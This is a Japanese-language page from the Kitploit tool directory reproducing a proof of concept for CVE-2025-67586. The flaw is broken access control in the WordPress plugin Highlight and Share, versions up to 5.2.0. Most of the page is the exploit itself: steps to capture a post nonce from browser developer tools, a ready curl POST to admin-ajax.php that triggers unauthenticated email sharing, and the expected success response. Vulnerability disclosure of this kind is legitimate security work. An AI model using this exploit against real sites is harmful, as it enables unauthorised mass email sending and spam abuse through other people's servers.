Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE — 解説記事 (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) | Kitploit
ツール/GitHubGitHub/r0xtsec/cve
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubr0xtsec/cve

CVE

解説記事 (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE

(CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) の解説

root@kitploit:~
--------------   CVE-2025-67586 Exploit PoC   --------------
  • エクスプロイトタイトル: WordPress Plugin 5.2.0 - アクセス制御の不備
  • ソフトウェアリンク: https://wordpress.org/plugins/highlight-and-share/
  • バージョン: <= 5.2.0 (必須)
  • CVE: CVE-2025-67586

==> 説明 DLX Pluginsが開発したWordPressプラグインに、アクセス制御の不備の脆弱性が存在します。 このプラグインは、適切な権限チェックなしに「メールで共有」機能を悪用することを可能にする、認証されていないAJAXアクションを公開しています。

認証されていない攻撃者は、有効な投稿ノンスを再利用してメール共有リクエストをトリガーし、ユーザー認証なしに不正なメール送信(スパムメール/悪用)を行うことができます。

==> 必要な権限 なし(認証不要)

==> 概念実証 (PoC)

ステップ1: インストール済みのプラグインがあるウェブサイトを選択

ステップ2: 有効なノンスを取得

  1. 公開された投稿を開く。
  2. テキストをハイライトし、メールで共有をクリック。
  3. 開発者ツール → ネットワーク → XHR を開く。
  4. メールを一度送信。
  5. 次の内容を含むリクエストをキャプチャ: action=has_email_social_modal nonce= post_id=

ステップ3: 認証されていないリクエストによるエクスプロイト

bashコマンド: (ウェブサイトURL、投稿URL、ノンスを置き換えてください)

curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed

--> 期待されるJSONレスポンス:

{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }

ツールをダウンロード